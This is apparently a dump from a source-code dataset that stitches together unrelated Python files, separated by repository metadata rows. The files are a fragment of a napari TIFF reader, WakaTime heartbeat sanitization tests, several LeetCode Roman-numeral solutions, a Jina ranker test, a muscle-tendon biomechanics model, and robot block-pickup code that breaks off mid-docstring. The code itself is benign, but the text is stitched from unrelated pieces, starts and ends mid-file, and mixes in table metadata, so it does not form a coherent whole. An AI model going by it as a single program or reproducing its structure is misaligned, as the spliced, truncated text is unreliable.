        shape, dtype, dx, dz, clims_ = get_tiff_meta(filenames[0], in_zip=in_zip)
        clims.append(clims_)
        # One lazily-read dask array per timepoint, stacked along time.
        lazy_arrays = [lazy_imread(fn, in_zip=in_zip) for fn in sorted(filenames)]
        dask_arrays = [
            da.from_delayed(delayed_reader, shape=shape, dtype=dtype)
            for delayed_reader in lazy_arrays
        ]
        stack = da.stack(dask_arrays, axis=0)
        data.append(stack)
    data = da.stack(data)  # channel axis becomes axis 0

    # User overrides take precedence over tiff/Settings.txt values.
    dx = OVERRIDES.get("dx") or dx
    dz = OVERRIDES.get("dz") or dz
    dzdx_ratio = dz / dx
    if (
        settings.get("params", {}).get("samplescan", False) or OVERRIDES.get("angle")
    ) and OVERRIDES.get("deskew", True):
        # if the image is the same size or smaller than the Settings.txt file, we deskew
        angle = OVERRIDES.get("angle")
        if angle is None:
            angle = settings["params"]["angle"]
        if shape[-1] <= settings["params"]["ny"] and angle > 0:
            deskew_func, new_shape, dzdx_ratio = get_deskew_func(
                data.shape,
                dx=OVERRIDES.get("dx") or settings["params"]["dx"],
                dz=OVERRIDES.get("dz") or settings["params"]["dz"],
                angle=angle,
                padval=OVERRIDES.get("padval") or 0,
            )
            data = data.map_blocks(deskew_func, dtype="float32", chunks=new_shape)

    # napari layer keyword arguments.
    meta = {
        "channel_axis": 0,
        "scale": (1, dzdx_ratio, 1, 1),
        "multiscale": False,
        "contrast_limits": OVERRIDES.get("contrast_limits") or clims,
        "name": OVERRIDES.get("name") or names,
    }
    if settings:
        meta["metadata"] = settings
    return [(data, meta)]
| 30.443878 | 88 | 0.597285 |
7954656b8354d0dffe0e7b179719c763c42b14da | 5,850 | py | Python | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | 1 | 2021-05-13T21:13:27.000Z | 2021-05-13T21:13:27.000Z | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | null | null | null | tests/test_heartbeat.py | Anton-Latukha/wakatime | 3035a28a3f996a11d928802dcb05844bb0a52655 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from wakatime.heartbeat import Heartbeat
import os
import logging
from testfixtures import log_capture
from .utils import DynamicIterable, TestCase, mock
class HeartbeatTestCase(TestCase):
    """Tests for wakatime.heartbeat.Heartbeat sanitization and UNC-path parsing."""

    @log_capture()
    def test_sanitize_removes_sensitive_data(self, logs):
        """With hide_file_names on and hide_branch_names=None, everything sensitive is scrubbed."""
        logging.disable(logging.NOTSET)

        class Args(object):
            # Minimal stand-in for the parsed CLI arguments object.
            exclude = []
            hide_file_names = ['.*']
            hide_project_names = []
            hide_branch_names = None
            include = []
            plugin = None
            include_only_with_project_file = None
            local_file = None

        data = {
            'entity': os.path.realpath('tests/samples/codefiles/python.py'),
            'type': 'file',
            'project': 'aproject',
            'branch': 'abranch',
        }

        heartbeat = Heartbeat(data, Args(), None)
        sanitized = heartbeat.sanitize()
        # Entity is replaced with a redacted name, keeping only the extension.
        self.assertEquals('HIDDEN.py', sanitized.entity)

        # All of these attributes must be stripped when file names are hidden.
        sensitive = [
            'branch',
            'dependencies',
            'lines',
            'lineno',
            'cursorpos',
        ]
        for item in sensitive:
            self.assertIsNone(getattr(sanitized, item))

        self.assertNothingPrinted()
        self.assertNothingLogged(logs)

    @log_capture()
    def test_sanitize_removes_sensitive_data_but_still_shows_branch(self, logs):
        """hide_branch_names=[] (no patterns) keeps branch/project while hiding the file."""
        logging.disable(logging.NOTSET)

        class Args(object):
            exclude = []
            hide_file_names = ['.*']
            hide_project_names = []
            hide_branch_names = []
            include = []
            plugin = None
            include_only_with_project_file = None
            local_file = None

        data = {
            'entity': os.path.realpath('tests/samples/codefiles/python.py'),
            'type': 'file',
            'project': 'aproject',
            'branch': 'abranch',
        }

        heartbeat = Heartbeat(data, Args(), None, _clone=True)
        sanitized = heartbeat.sanitize()
        self.assertEquals('HIDDEN.py', sanitized.entity)
        # Branch and project survive because no hide patterns matched them.
        self.assertEquals('abranch', sanitized.branch)
        self.assertEquals('aproject', sanitized.project)

        sensitive = [
            'dependencies',
            'lines',
            'lineno',
            'cursorpos',
        ]
        for item in sensitive:
            self.assertIsNone(getattr(sanitized, item))

        self.assertNothingPrinted()
        self.assertNothingLogged(logs)

    @log_capture()
    def test_sanitize_does_nothing_when_hidefilenames_false(self, logs):
        """With no hide_file_names patterns, sanitize leaves the heartbeat untouched."""
        logging.disable(logging.NOTSET)

        class Args(object):
            exclude = []
            hide_file_names = []
            hide_project_names = []
            hide_branch_names = None
            include = []
            plugin = None
            include_only_with_project_file = None
            local_file = None

        data = {
            'entity': os.path.realpath('tests/samples/codefiles/python.py'),
            'type': 'file',
            'project': 'aproject',
            'branch': 'abranch',
        }

        heartbeat = Heartbeat(data, Args(), None)
        heartbeat.branch = data['branch']
        sanitized = heartbeat.sanitize()
        self.assertEquals(data['branch'], sanitized.branch)

        self.assertNothingPrinted()
        self.assertNothingLogged(logs)

    @log_capture()
    def test_sanitize_does_nothing_when_missing_entity(self, logs):
        """A heartbeat without an entity is passed through unchanged."""
        logging.disable(logging.NOTSET)

        class Args(object):
            hide_file_names = ['.*']
            hide_project_names = []
            hide_branch_names = None
            plugin = None

        branch = 'abc123'
        data = {
            'entity': None,
            'type': 'file',
            'branch': branch,
        }

        heartbeat = Heartbeat(data, Args(), None, _clone=True)
        sanitized = heartbeat.sanitize()
        self.assertEquals(branch, sanitized.branch)

        self.assertNothingPrinted()
        self.assertNothingLogged(logs)

    @log_capture()
    def test_sanitize_does_nothing_when_type_not_file(self, logs):
        """Sanitization only applies to 'file' heartbeats; 'app' entities are untouched."""
        logging.disable(logging.NOTSET)

        class Args(object):
            hide_file_names = ['.*']
            hide_project_names = []
            hide_branch_names = None
            plugin = None

        branch = 'abc123'
        data = {
            'entity': 'not.a.file',
            'type': 'app',
            'branch': branch,
        }

        heartbeat = Heartbeat(data, Args(), None, _clone=True)
        sanitized = heartbeat.sanitize()
        self.assertEquals(branch, sanitized.branch)

        self.assertNothingPrinted()
        self.assertNothingLogged(logs)

    def test_parsing(self):
        """_to_unc_path maps drive letters to UNC paths using mocked `net use` output."""

        class Args(object):
            hide_file_names = ['.*']
            hide_project_names = []
            hide_branch_names = None
            plugin = None

        # (fixture file, local drive path, expected UNC translation)
        samples = [
            ('v1', 'C:\\v1\\file.txt', '\\\\vboxsrv\\Projects\\v1\\file.txt'),
            ('v2', 'D:\\stuff\\v2\\file.py', '\\\\192.0.0.1\\work\\stuff\\v2\\file.py'),
        ]
        for sample, filepath, expected in samples:
            with mock.patch('wakatime.heartbeat.Popen') as mock_popen:
                class MockCommunicate(object):
                    pass
                # Feed captured `net use` output through the mocked subprocess.
                stdout = open('tests/samples/netuse/' + sample).read()
                mock_communicate = MockCommunicate()
                mock_communicate.communicate = mock.MagicMock(return_value=DynamicIterable((stdout, ''), max_calls=1))
                mock_popen.return_value = mock_communicate
                heartbeat = Heartbeat({'user_agent': 'test'}, Args(), None, _clone=True)
                result = heartbeat._to_unc_path(filepath)
                self.assertEquals(expected, result)

        self.assertNothingPrinted()
7954662bac0624b2208f69bb3698d0b379b4f28a | 4,267 | py | Python | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Math/roman-to-integer.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | """
13. Roman to Integer
Easy
Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M.
Symbol Value
I 1
V 5
X 10
L 50
C 100
D 500
M 1000
For example, 2 is written as II in Roman numeral, just two one's added together. 12 is written as XII, which is simply X + II. The number 27 is written as XXVII, which is XX + V + II.
Roman numerals are usually written largest to smallest from left to right. However, the numeral for four is not IIII. Instead, the number four is written as IV. Because the one is before the five we subtract it making four. The same principle applies to the number nine, which is written as IX. There are six instances where subtraction is used:
I can be placed before V (5) and X (10) to make 4 and 9.
X can be placed before L (50) and C (100) to make 40 and 90.
C can be placed before D (500) and M (1000) to make 400 and 900.
Given a roman numeral, convert it to an integer.
Example 1:
Input: s = "III"
Output: 3
Explanation: III = 3.
Example 2:
Input: s = "LVIII"
Output: 58
Explanation: L = 50, V= 5, III = 3.
Example 3:
Input: s = "MCMXCIV"
Output: 1994
Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.
Constraints:
1 <= s.length <= 15
s contains only the characters ('I', 'V', 'X', 'L', 'C', 'D', 'M').
It is guaranteed that s is a valid roman numeral in the range [1, 3999].
Accepted
1,414,292
Submissions
2,443,425
"""
# V0
class Solution(object):
    def romanToInt(self, s):
        """Convert a Roman-numeral string to its integer value.

        Scans right-to-left: a symbol smaller than the one to its right is
        subtractive notation (e.g. the I in IV) and is subtracted; otherwise
        it is added.
        """
        values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        total = values[s[-1]]
        prev = total  # value of the symbol immediately to the right
        for symbol in reversed(s[:-1]):
            current = values[symbol]
            if current < prev:
                total -= current
            else:
                total += current
            prev = current
        return total
# V1
# https://blog.csdn.net/fuxuemingzhu/article/details/48208995
class Solution(object):
    def romanToInt(self, s):
        """
        :type s: str
        :rtype: int
        """
        symbol_values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        # Seed with the last symbol, then walk leftward with an index cursor.
        total = symbol_values[s[-1]]
        cursor = len(s) - 2
        while cursor >= 0:
            left = symbol_values[s[cursor]]
            right = symbol_values[s[cursor + 1]]
            # A smaller symbol before a larger one is subtractive (IV, XC, ...).
            total += left if left >= right else -left
            cursor -= 1
        return total
# V1'
# https://www.jiuzhang.com/solution/roman-to-integer/#tag-highlight-lang-python
class Solution:
    # @param {string} s
    # @return {integer}
    def romanToInt(self, s):
        """Convert a Roman numeral to an integer; empty input yields 0."""
        ROMAN = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}
        if s == "":
            return 0
        total = ROMAN[s[-1]]
        # Walk right-to-left; a symbol smaller than its right neighbour is
        # subtractive notation (e.g. the C in CM).
        for index in range(len(s) - 2, -1, -1):
            if ROMAN[s[index]] < ROMAN[s[index + 1]]:
                total -= ROMAN[s[index]]
            else:
                total += ROMAN[s[index]]
        return total
# V2
# https://blog.csdn.net/fuxuemingzhu/article/details/48208995
class Solution(object):
    def romanToInt(self, s):
        """
        :type s: str
        :rtype: int
        """
        values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        total = values[s[-1]]
        right = total
        # Traverse right-to-left, skipping the final symbol (already counted).
        for ch in s[-2::-1]:
            left = values[ch]
            total += -left if left < right else left
            right = left
        return total
# V3
# Time: O(n)
# Space: O(1)
class Solution(object):
    # @return an integer
    def romanToInt(self, s):
        """Left-to-right conversion: correct a too-small previous symbol on the fly."""
        values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        total = 0
        prev = 0  # value of the previous symbol (0 before the first one)
        for ch in s:
            cur = values[ch]
            # If the previous symbol was smaller it was wrongly added: back it
            # out twice (once to cancel the add, once for the subtraction).
            total += cur - 2 * prev if prev and cur > prev else cur
            prev = cur
        return total
| 27.352564 | 345 | 0.494727 |
79546738b7fe4f0e154bb33a04dceae5f50a7c1b | 1,816 | py | Python | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | 1 | 2022-03-01T12:43:17.000Z | 2022-03-01T12:43:17.000Z | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | null | null | null | rankers/MinRanker/tests/test_minranker.py | carlosb1/jina-hub | f298d0f136c8627dd720d7a4e3eb9031655f5ccb | [
"Apache-2.0"
] | null | null | null | import numpy as np
from jina.executors.rankers import Chunk2DocRanker
from .. import MinRanker
def create_data():
    """Build a synthetic match table plus chunk metadata for ranker tests.

    Returns:
        tuple: (match_idx, query_chunk_meta, match_chunk_meta) where
        match_idx is a numpy structured array with one row per
        (match parent id, match chunk id, query chunk id, score).
    """
    # Maps query chunk id -> list of match-chunk descriptors.
    query_chunk2match_chunk = {
        100: [
            {'parent_id': 1, 'id': 10, 'score': 0.4, 'length': 200},
        ],
        110: [
            {'parent_id': 1, 'id': 10, 'score': 0.3, 'length': 200},
            {'parent_id': 1, 'id': 11, 'score': 0.2, 'length': 200},
            {'parent_id': 4294967294, 'id': 20, 'score': 0.1, 'length': 300},
        ]
    }
    query_chunk_meta = {}
    match_chunk_meta = {}
    match_idx = []
    num_query_chunks = len(query_chunk2match_chunk)
    for query_chunk_id, matches in query_chunk2match_chunk.items():
        query_chunk_meta[query_chunk_id] = {'length': num_query_chunks}
        for c in matches:
            match_chunk_meta[c['id']] = {'length': c['length']}
            match_idx.append((
                c['parent_id'],
                c['id'],
                query_chunk_id,
                c['score'],
            ))
    # Column names/dtypes must match what Chunk2DocRanker.score() expects.
    match_idx_numpy = np.array(
        match_idx,
        dtype=[
            (Chunk2DocRanker.COL_MATCH_PARENT_ID, np.int64),
            (Chunk2DocRanker.COL_MATCH_ID, np.int64),
            (Chunk2DocRanker.COL_DOC_CHUNK_ID, np.int64),
            (Chunk2DocRanker.COL_SCORE, np.float64)
        ]
    )
    return match_idx_numpy, query_chunk_meta, match_chunk_meta
def test_minranker():
    """MinRanker.score should return per-doc scores ranked in descending order."""
    ranker = MinRanker()
    match_idx, query_chunk_meta, match_chunk_meta = create_data()
    doc_idx = ranker.score(match_idx, query_chunk_meta, match_chunk_meta)
    # check the matched docs are in descending order of the scores
    assert doc_idx[0][1] > doc_idx[1][1]
    assert doc_idx[0][0] == 4294967294
    assert doc_idx[1][0] == 1
    # check the number of matched docs
    assert len(doc_idx) == 2
| 31.310345 | 77 | 0.589207 |
7954676a7f4080046cb014f598c4d4d80268316f | 5,468 | py | Python | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | DartMuscle/muscle.py | hpgit/HumanFoot | f9a1a341b7c43747bddcd5584b8c98a0d1ac2973 | [
"Apache-2.0"
] | null | null | null | from math import exp, sin, cos, asin, pi, sqrt
from scipy.optimize import minimize_scalar
# muscle specific parameters
# NOTE(review): placeholder zeros — these are expected to be assigned
# per-muscle before the g_*_tilde functions are used; with the defaults of 0
# the normalizations below divide by zero (e.g. l_t / l_t_sl in g_t_tilde).
f_m_o, l_m_o, l_t_sl, alpha_opt = 0, 0, 0, 0

# all muscles share these parameters
eps_t_o = 0.033          # reference tendon strain (scales k_lin and eps_t_toe)
eps_m_o = 0.6            # passive muscle strain scale (used in g_pl_tilde)
k_pe = 4.0               # passive force-length exponential shape factor
gamma = 0.5              # width of the active force-length gaussian
dot_l_m_max_tilde = 10.  # normalized maximum contraction velocity
f_m_len_tilde = 1.8      # normalized force plateau when lengthening
A_f = 0.3                # force-velocity curvature constant

# Force-Length Relationship of Tendon
f_t_toe_tilde = 0.33     # normalized tendon force at the end of the toe region
k_toe = 3.0              # toe-region exponential shape factor
k_lin = 1.712 / eps_t_o  # slope of the linear tendon region
eps_t_toe = 0.609 * eps_t_o  # strain at which the toe region ends
def g_t_tilde(l_t):
    """Normalized tendon force for tendon length ``l_t``.

    Strain is measured against the module-level slack length ``l_t_sl``:
    exponential "toe" region for strains up to ``eps_t_toe``, linear region
    above it.

    NOTE(review): unlike compute_norm_tendon_force_scalar below, negative
    strain is not clamped to zero here — confirm whether callers rely on that.
    """
    eps_t = l_t / l_t_sl - 1.
    if eps_t <= eps_t_toe:
        # BUG FIX: the "- 1." belongs outside exp().  The previous form,
        # exp(k_toe * eps_t / eps_t_toe - 1.) - 1., made the toe region
        # discontinuous with the linear region at eps_t == eps_t_toe and
        # disagreed with compute_norm_tendon_force_scalar.
        return f_t_toe_tilde * (exp(k_toe * eps_t / eps_t_toe) - 1.) \
               / \
               (exp(k_toe) - 1.)
    else:
        return k_lin * (eps_t - eps_t_toe) + f_t_toe_tilde
# Passive Force-Length Relationship of Muscle
def g_pl_tilde(l_m):
    """Normalized passive muscle-fiber force for fiber length ``l_m``.

    Length is normalized by the module-level optimal fiber length ``l_m_o``;
    passive force is zero at or below optimal length and rises exponentially
    above it.
    """
    l_m_tilde = l_m / l_m_o
    if l_m_tilde <= 1:
        return 0
    else:
        return (exp(k_pe * (l_m_tilde - 1)/eps_m_o) - 1) \
               / \
               (exp(k_pe) - 1)
# Active Force-Length Relationship of Muscle
def g_al_tilde(l_m):
    """Normalized active force-length scaling: gaussian peaking at l_m == l_m_o."""
    l_m_tilde = l_m / l_m_o
    return exp(-(l_m_tilde-1)*(l_m_tilde-1)/gamma)
# Force-Velocity Relationship of Muscle
def g_vl_tilde(dot_l_m):
    """Normalized force-velocity scaling for fiber velocity ``dot_l_m``.

    Velocity is normalized by the module-level optimal fiber length ``l_m_o``.
    Shortening (velocity <= 0) follows a hyperbolic branch; lengthening rises
    toward the plateau ``f_m_len_tilde``.
    """
    dot_l_m_tilde = dot_l_m / l_m_o
    if dot_l_m_tilde <= 0:
        return (dot_l_m_tilde + dot_l_m_max_tilde) \
               / \
               (dot_l_m_max_tilde - dot_l_m_tilde/A_f)
    else:
        _a = dot_l_m_tilde * (2. + 2./A_f)
        _b = dot_l_m_max_tilde * (f_m_len_tilde - 1.)
        return (f_m_len_tilde * _a + _b) / (_a + _b)
def compute_activation_deriv_scalar(u, a, tau_act, tau_deact):
    """Rate of change of muscle activation ``a`` toward excitation ``u``.

    First-order activation dynamics: the effective time constant depends on
    whether the muscle is activating (u >= a) or deactivating (u < a), and
    scales with the current activation level.
    """
    if u < a:
        effective_tau = tau_deact / (0.5 + 1.5 * a)
    else:
        effective_tau = tau_act * (0.5 + 1.5 * a)
    return (u - a) / effective_tau
def compute_cos_pennation_scalar(l_m, l_m_opt, pa_opt):
    """Cosine of the pennation angle for fiber length ``l_m``.

    Keeps the fiber height (l_m_opt * sin(pa_opt)) constant as the fiber
    shortens.  A (near-)zero fiber length maps to 90 degrees before the
    angle is clamped to at most 45 degrees.
    """
    fiber_len = max(l_m, 0.)
    if fiber_len < 1e-6:
        angle = asin(1.)  # degenerate fiber: treat as fully pennated
    else:
        angle = asin(l_m_opt * sin(pa_opt) / fiber_len)
    return cos(min(angle, pi / 4.))
def compute_norm_tendon_force_scalar(eps_t, eps_t_o):
    """Normalized tendon force for tendon strain ``eps_t``.

    Zero for non-positive strain, exponential toe region up to the
    module-level ``eps_t_toe``, linear region above it.

    NOTE(review): the ``eps_t_o`` parameter is unused — the curve is driven
    entirely by the module-level constants (k_toe, k_lin, eps_t_toe,
    f_t_toe_tilde).  Confirm whether it was meant to parameterize the curve.
    """
    f_t_norm = 0.
    if eps_t > eps_t_toe:
        # Linear region.
        f_t_norm = k_lin * (eps_t - eps_t_toe) + f_t_toe_tilde
    elif eps_t > 0.:
        # Exponential toe region.
        f_t_norm = (f_t_toe_tilde / (exp(k_toe)-1.)) * (exp(k_toe * eps_t / eps_t_toe) - 1.)
    else:
        # Slack tendon produces no force.
        f_t_norm = 0.
    return f_t_norm
def compute_norm_passive_fiber_force_by_length_scalar(l_m_norm, eps_m_o, k_pe):
    """Normalized passive fiber force for normalized fiber length ``l_m_norm``.

    Zero at or below optimal length (l_m_norm <= 1); exponential rise above
    it, scaled so the force reaches 1 at a passive strain of ``eps_m_o``.
    """
    if l_m_norm <= 1.:
        return 0
    strain = l_m_norm - 1.
    return (exp(k_pe * strain / eps_m_o) - 1.) / (exp(k_pe) - 1.)
def compute_norm_active_fiber_force_by_length_scalar(l_m_norm, gamma):
    """Gaussian active force-length curve, peaking at optimal length (1.0)."""
    deviation = l_m_norm - 1.
    return exp(-(deviation * deviation) / gamma)
def compute_norm_active_fiber_force_by_velocity_scalar(dl_mdt_norm, a_f, f_m_len, v_m_max):
    """Force-velocity scaling factor for normalized fiber velocity.

    Hyperbolic branch for shortening (velocity <= 0); for lengthening the
    force rises toward the plateau ``f_m_len``.
    """
    if dl_mdt_norm <= 0.:
        # Concentric (shortening) branch.
        return (dl_mdt_norm + v_m_max) / (v_m_max - dl_mdt_norm / a_f)
    # Eccentric (lengthening) branch.
    vel_term = dl_mdt_norm * (2. + 2. / a_f)
    plateau_term = v_m_max * (f_m_len - 1.)
    return (f_m_len * vel_term + plateau_term) / (vel_term + plateau_term)
def compute_norm_fiber_length_deriv_scalar(f_m_norm, a, f_l, a_f, f_m_len, damping, v_m_max, option=None):
    """Invert the force-velocity relation: normalized fiber velocity that
    yields active fiber force ``f_m_norm`` given activation ``a`` and
    force-length scaling ``f_l``.

    With damping > 0 the damped force-velocity equation is solved in closed
    form as a quadratic; otherwise the undamped relation is inverted
    directly.  The result is scaled by ``v_m_max``.

    NOTE(review): ``option`` is accepted but never used here.
    """
    a_f_l = a * f_l
    if damping > 0.:
        d = damping
        k = 1.
        # Quadratic _a*x^2 + _b*x + _c = 0 in the unit velocity x; the
        # coefficients differ between the concentric branch
        # (f_m_norm <= a*f_l) and the eccentric branch.
        if f_m_norm <= a_f_l:
            _a = d/a_f
            _b = -(a_f_l + f_m_norm/a_f + k*d)
            _c = k*(f_m_norm - a_f_l)
        else:
            _a = -(2.+2./a_f) * d / f_m_len
            _b = -((2.+2./a_f) * (a_f_l*f_m_len - f_m_norm)/(f_m_len-1.) + k*d)
            _c = k*(f_m_norm - a_f_l)
        det = _b*_b - 4*_a*_c
        # Take the (-b - sqrt(det)) root of the quadratic.
        dl_mdt_unit = (-_b-sqrt(det))/(2.*_a)
    else:
        # Undamped inversion: velocity = (f_m_norm - a*f_l) / _b.
        if f_m_norm <= a_f_l:
            _b = a_f_l + (f_m_norm / a_f)
        else:
            _b = ( (2. + 2. /a_f) * (a_f_l * f_m_len - f_m_norm ) ) / (f_m_len - 1.)
        if _b > 0.:
            dl_mdt_unit = (f_m_norm - a_f_l) / _b
        else:
            # Degenerate denominator: report zero velocity.
            dl_mdt_unit = 0.
    return v_m_max * dl_mdt_unit
def get_fiber_length_deriv_scalar(a, l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
                                  k_pe, gamma, a_f, f_m_len, damping, v_m_max, option=None):
    """Fiber-length derivative (velocity) for the muscle-tendon equilibrium.

    Derives tendon strain from the muscle-tendon length ``l_mt`` and the
    current fiber length ``l_m``, computes the active fiber force needed to
    balance the tendon force, then inverts the force-velocity relation.

    Returns:
        float: dl_m/dt in the same length units as ``l_m_opt``.
    """
    cos_pa = compute_cos_pennation_scalar(l_m, l_m_opt, pa_opt)
    # Tendon takes whatever length the (pennated) fiber does not cover.
    l_t = l_mt - l_m * cos_pa
    eps_t = (l_t - l_t_sl) / l_t_sl
    f_t_norm = compute_norm_tendon_force_scalar(eps_t, eps_t_o)
    l_m_norm = l_m / l_m_opt
    f_p_norm = compute_norm_passive_fiber_force_by_length_scalar(l_m_norm, eps_m_o, k_pe)
    f_l = compute_norm_active_fiber_force_by_length_scalar(l_m_norm, gamma)
    # Active fiber force = tendon force projected along the fiber, minus
    # the passive contribution.
    f_m_norm = f_t_norm / cos_pa - f_p_norm
    dl_mdt_norm = compute_norm_fiber_length_deriv_scalar(f_m_norm, a, f_l, a_f, f_m_len, damping, v_m_max, option)
    dl_mdt = l_m_opt * dl_mdt_norm
    return dl_mdt
def get_isometric_fiber_length(a, l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
                               k_pe, gamma, a_f, f_m_len, damping, v_m_max, option=None):
    """Fiber length at which the fiber velocity is zero (static equilibrium).

    Minimizes the squared fiber velocity over [0, max(0, l_mt - l_t_sl)]
    with a bounded scalar search.

    NOTE(review): the ``l_m`` and ``option`` arguments are unused here; the
    inner call always passes the 'modified_damping' option.
    """
    def obj_dl_m(_l_m):
        # Squared fiber velocity — zero exactly at equilibrium.
        dl_mdt = get_fiber_length_deriv_scalar(a, _l_m, l_mt, l_m_opt, pa_opt, l_t_sl, eps_t_o, eps_m_o,
                                               k_pe, gamma, a_f, f_m_len, damping, v_m_max, 'modified_damping')
        return dl_mdt * dl_mdt
    ub = max(0., l_mt - l_t_sl)
    result = minimize_scalar(obj_dl_m, bounds=(0., ub), method='bounded')
    return result.x
class Muscle(object):
def __init__(self):
pass | 28.778947 | 114 | 0.604426 |
795468c51f7208813c6000e19243e56b0e75dc2b | 8,159 | py | Python | targetApproach.py | BenjiLee0002/TheUglyDuckling | 13a4bf3307ac5959a7ceb32122a53b91bec2b7f3 | [
"MIT"
] | 4 | 2019-09-25T17:44:07.000Z | 2021-11-03T15:34:19.000Z | targetApproach.py | RishavRajendra/TheUglyDuckling | 1726dd1d4b5c35e4e2b421a8652133724100fffd | [
"MIT"
] | null | null | null | targetApproach.py | RishavRajendra/TheUglyDuckling | 1726dd1d4b5c35e4e2b421a8652133724100fffd | [
"MIT"
] | 1 | 2019-11-22T14:53:17.000Z | 2019-11-22T14:53:17.000Z | from get_stats_from_image import corrected_angle, get_closest_target
from constants import fwd, rev
import time, math
# DONE: Check if the block is actually picked up
def check_pick_up(movement, pic_q):
    """Check whether a block is held after a pickup attempt.

    Looks down with the camera and reports success when a target is detected
    within 5 inches (presumably the block sitting in the claw — TODO confirm
    against caller expectations).

    Args:
        movement: Robot movement controller (cam_down/cam_up).
        pic_q: Queue of processed camera frames for target detection.

    Returns:
        list: [success (bool), target_id (int) of the closest detection].
    """
    movement.cam_down()
    # Give the vision pipeline time to deliver a fresh frame.
    time.sleep(3)
    target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
    # Fixed: was "target_id is not 0" — identity comparison on an int literal.
    success = target_id != 0 and inches < 5
    movement.cam_up()
    return [success, target_id]
def move_to_target(movement, angle, distance):
    """Drive ``distance`` inches forward toward the target.

    The alignment turn is commented out — callers are expected to have
    already turned toward the target, so ``angle`` is currently unused.
    """
    #movement.turn(angle)
    movement.move(fwd, distance)
def move_back_from_target(movement, angle, distance):
    """Reverse ``distance`` inches away from the target.

    The un-turn is commented out to mirror move_to_target; ``angle`` is
    currently unused.
    """
    movement.move(rev, distance)
    #movement.turn(-1*angle)
"""
DONE: Refine pick_up. Take care of edge cases.
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion. Not getting satisfying results.
"""
def pick_up(movement, pic_q):
    """Align with the closest target and pick it up with the claw.

    Looks down with the camera; if the target is already centered in the
    pickup zone it is grabbed directly, otherwise the robot turns toward it,
    drives up, grabs, and reverses the approach so it ends where it started.

    Args:
        movement: Robot movement controller (cam_down/cam_up/turn/move/pickup).
        pic_q: Queue of processed camera frames for target detection.
    """
    movement.cam_down()
    # Let the imaging catch up (frame rate can be as low as ~0.75 fps).
    time.sleep(3)
    # Get data from the closest object.
    target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
    # Fixed: was "target_id is not 0" — identity comparison on an int literal.
    if target_id != 0:
        if 125 < midpoint[0] < 230 and midpoint[1] > 255:
            # Target already centered in the pickup zone.
            movement.pickup()
        else:
            correctedAngle = corrected_angle(angle, inches, False)
            movement.turn(-correctedAngle)
            # Get another picture as distance can get wacky at an angle.
            target_id, angle, inches, midpoint = get_closest_target(pic_q, True)
            # Adjust angle/distance from the front of the robot instead of
            # the middle of the robot.
            adjustedDistance = math.ceil(inches * 0.75)
            adjustedAngle = corrected_angle(angle, inches, False)
            # Angles reversed because East is 0 and we increase going around.
            move_to_target(movement, -1 * adjustedAngle, adjustedDistance)
            movement.pickup()
            move_back_from_target(movement, adjustedAngle, adjustedDistance)
            # Undo the initial alignment turn.
            movement.turn(correctedAngle)
    movement.cam_up()
# Moves the robot close to the target
def approach_helper(angle, distance, pic_q, movement):
    """Drive up to the target, attempt a pickup, then back out.

    Args:
        angle: Raw angle to the target from the camera frame (degrees).
        distance: Distance to the target in inches.
        pic_q: Queue of processed camera frames.
        movement: Robot movement controller.
    """
    movement.cam_up()
    movement.reset_servo()
    # Convert the camera-frame angle to a turn from the robot's center.
    adjustedAngle = corrected_angle(angle, distance)
    # Move towards the target.
    # Angles reversed because East is 0 and we increase as we go around.
    move_to_target(movement,-1*adjustedAngle, distance)
    # Realign with the block and grab it.
    pick_up(movement, pic_q)
    # Reverse movement from the target so the robot returns to its tile.
    move_back_from_target(movement, adjustedAngle, distance)
# DONE: Refine approach. Take care of edge cases.
# EDGE CASE 1: obstacle is in way of target
# Potential solution: go to another connected tile
# DONE CASE 2: target not detected after two additional scans.
# DONE CASE 3: second object detected in background
# EDGE CASE 4: target at a very bad angle
"""
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion as results not satisfying.
"""
def approach(movement, pic_q):
    """Scan for the closest target and, if reachable, drive in and pick it up.

    Scans straight ahead first; if nothing usable is found, sweeps 20 degrees
    to either side with the camera up, then repeats the sweep with the camera
    tilted down (backing up 4 inches first so close targets stay in frame).

    Args:
        movement: Robot movement controller.
